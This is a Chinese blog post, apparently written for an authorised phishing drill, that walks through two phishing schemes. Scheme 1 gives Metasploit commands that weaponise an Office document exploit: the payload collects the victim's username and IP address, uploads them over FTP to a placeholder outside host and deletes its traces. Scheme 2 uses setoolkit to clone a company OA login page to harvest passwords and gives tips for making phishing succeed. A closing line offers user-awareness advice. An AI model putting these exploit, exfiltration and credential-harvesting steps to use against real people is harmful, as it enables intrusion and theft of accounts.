<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="metasploit,钓鱼邮件,setoolkit," />










<meta name="description" content="前记&amp;#160; &amp;#160; &amp;#160; &amp;#160;上一篇文中，解决了前半部分的发送问题，这篇主要想讨论一下钓鱼的一些思路及实现方式。目前常见的钓鱼方式有如下几种：  发送恶意附件，客户运行后在客户端植入木马病毒   发送钓鱼网站链接，来获取用户账户密码   发送存有恶意代码的网站链接，利用浏览器漏洞在客户端植入木马病毒   …    方案1&amp;#160; &amp;#160; &amp;#160; &amp;#16">
<meta name="keywords" content="metasploit,钓鱼邮件,setoolkit">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次钓鱼邮件攻防演练环境准备（2）">
<meta property="og:url" content="http://yoursite.com/2018/07/16/记一次钓鱼邮件攻防演练环境准备（2）/index.html">
<meta property="og:site_name" content="L&#39;s tale">
<meta property="og:description" content="前记&amp;#160; &amp;#160; &amp;#160; &amp;#160;上一篇文中，解决了前半部分的发送问题，这篇主要想讨论一下钓鱼的一些思路及实现方式。目前常见的钓鱼方式有如下几种：  发送恶意附件，客户运行后在客户端植入木马病毒   发送钓鱼网站链接，来获取用户账户密码   发送存有恶意代码的网站链接，利用浏览器漏洞在客户端植入木马病毒   …    方案1&amp;#160; &amp;#160; &amp;#160; &amp;#16">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-5.png">
<meta property="og:updated_time" content="2018-07-16T12:11:19.277Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="记一次钓鱼邮件攻防演练环境准备（2）">
<meta name="twitter:description" content="前记&amp;#160; &amp;#160; &amp;#160; &amp;#160;上一篇文中，解决了前半部分的发送问题，这篇主要想讨论一下钓鱼的一些思路及实现方式。目前常见的钓鱼方式有如下几种：  发送恶意附件，客户运行后在客户端植入木马病毒   发送钓鱼网站链接，来获取用户账户密码   发送存有恶意代码的网站链接，利用浏览器漏洞在客户端植入木马病毒   …    方案1&amp;#160; &amp;#160; &amp;#160; &amp;#16">
<meta name="twitter:image" content="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/07/16/记一次钓鱼邮件攻防演练环境准备（2）/"/>





  <title>记一次钓鱼邮件攻防演练环境准备（2） | L's tale</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">L's tale</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/07/16/记一次钓鱼邮件攻防演练环境准备（2）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="L.Lawliet">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/L.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L's tale">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">记一次钓鱼邮件攻防演练环境准备（2）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-07-16T20:05:06+08:00">
                2018-07-16
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="前记"><a href="#前记" class="headerlink" title="前记"></a>前记</h3><p>&#160; &#160; &#160; &#160;上一篇文中，解决了前半部分的发送问题，这篇主要想讨论一下钓鱼的一些思路及实现方式。目前常见的钓鱼方式有如下几种：</p>
<ul>
<li>发送恶意附件，客户运行后在客户端植入木马病毒  </li>
<li>发送钓鱼网站链接，来获取用户账户密码  </li>
<li>发送存有恶意代码的网站链接，利用浏览器漏洞在客户端植入木马病毒  </li>
<li>…  </li>
</ul>
<h3 id="方案1"><a href="#方案1" class="headerlink" title="方案1"></a>方案1</h3><p>&#160; &#160; &#160; &#160;通过发送恶意附件，利用各种程序漏洞，在目标机器执行代码是钓鱼的常用技巧，现在有些漏洞的利用难度越来越低，也让钓鱼成功率大大增加，此案例1就以利用office漏洞为例，在目标执行office文件后，执行命令收集目标机器的账户名和IP地址，这里是通过自建一个自动上传至ftp的bat文件把主机信息收集起来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#使用office漏洞作为附件收集机器信息</span><br><span class="line">use exploit/windows/fileformat/office_word_hta</span><br><span class="line"></span><br><span class="line">#使用exec执行命令收集</span><br><span class="line">set PAYLOAD windows/exec</span><br><span class="line"></span><br><span class="line">#设置执行语句，在本地获取信息后发送到ftp服务器</span><br><span class="line">set CMD cmd.exe /c whoami &gt;&gt; info.txt &amp;&amp; ipconfig &gt;&gt; info.txt &amp;&amp; echo @echo off &gt;&gt; info.bat &amp; echo ftp -n -s:ftp.cfg &gt;&gt; info.bat &amp; echo open xxx.xxx.xxx.xxx &gt;&gt; ftp.cfg &amp; echo user test 123 &gt;&gt; ftp.cfg &amp; echo prompt off &gt;&gt; ftp.cfg &amp; echo bin &gt;&gt; ftp.cfg &amp; echo put info.txt &gt;&gt; ftp.cfg %random%%random%.txt &amp; echo bye &gt;&gt; ftp.cfg &amp;&amp; info.bat &amp;&amp; del ftp.cfg &amp;&amp; del info.txt &amp;&amp; del info.bat &amp;&amp; exit</span><br></pre></td></tr></table></figure></p>
<p><img src="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-1.png" alt="image">  </p>
<p><img src="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-2.png" alt="image">  </p>
<p><img src="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-3.png" alt="image">  </p>
<h3 id="方案2"><a href="#方案2" class="headerlink" title="方案2"></a>方案2</h3><p>&#160; &#160; &#160; &#160;通过邮件模拟企业内发生的事件，引诱用户点击钓鱼链接，来获取目标账户密码信息，加强此方案的成功率需要注意以下几点：</p>
<ul>
<li>发件人地址与邮件内容相关责任人相似</li>
<li>邮件格式风格，logo等与企业相似</li>
<li>钓鱼站点与真实站点相似，这里可以结合站点克隆工具或直接下载站点前端源码</li>
<li>钓鱼站点域名与真实站点相似</li>
<li>尽量选在中午12点-下午2点之间，此时间段非集中工作时间段，钓鱼的成功率较大  </li>
</ul>
<p>&#160; &#160; &#160; &#160;这里使用setoolkit克隆目标站点，来获取上钩目标的用户密码信息。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#运行setoolkit，依次选择1&gt;2&gt;3&gt;2</span><br><span class="line">#设置监听端口（实际情况下需要公网地址）</span><br><span class="line">set:webattack&gt; IP address for the POST back in Harvester/Tabnabbing [192.168.218.128]:</span><br><span class="line">[-] SET supports both HTTP and HTTPS</span><br><span class="line">[-] Example: http://www.thisisafakesite.com</span><br><span class="line">#设置克隆目标站点</span><br><span class="line">set:webattack&gt; Enter the url to clone:https://oa.xxx.com/defaultroot/</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-4.png" alt="image">  </p>
<p><img src="https://raw.githubusercontent.com/rosetscmite/tu/master/6/6-5.png" alt="image">  </p>
<h3 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h3><p>&#160; &#160; &#160; &#160;钓鱼邮件主要还是多以<strong>上级发送给下级索要敏感信息、爆发紧急事件等</strong>类型来降低目标警惕性，用户在查看邮件时要注意发件人是否为假冒的相似域名，称谓是否反常，URL链接不要轻易点开等。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/metasploit/" rel="tag"><i class="fa fa-tag"></i> metasploit</a>
          
            <a href="/tags/钓鱼邮件/" rel="tag"><i class="fa fa-tag"></i> 钓鱼邮件</a>
          
            <a href="/tags/setoolkit/" rel="tag"><i class="fa fa-tag"></i> setoolkit</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/08/记一次钓鱼邮件攻防演练环境准备（1）/" rel="next" title="记一次钓鱼邮件攻防演练环境准备（1）">
                <i class="fa fa-chevron-left"></i> 记一次钓鱼邮件攻防演练环境准备（1）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/10/利用Maltego平台生成攻击溯源图/" rel="prev" title="利用Maltego平台生成攻击溯源图">
                利用Maltego平台生成攻击溯源图 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/L.jpg"
                alt="L.Lawliet" />
            
              <p class="site-author-name" itemprop="name">L.Lawliet</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前记"><span class="nav-number">1.</span> <span class="nav-text">前记</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#方案1"><span class="nav-number">2.</span> <span class="nav-text">方案1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#方案2"><span class="nav-number">3.</span> <span class="nav-text">方案2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#后记"><span class="nav-number">4.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">L.Lawliet</span>

  
</div>

<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>

-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
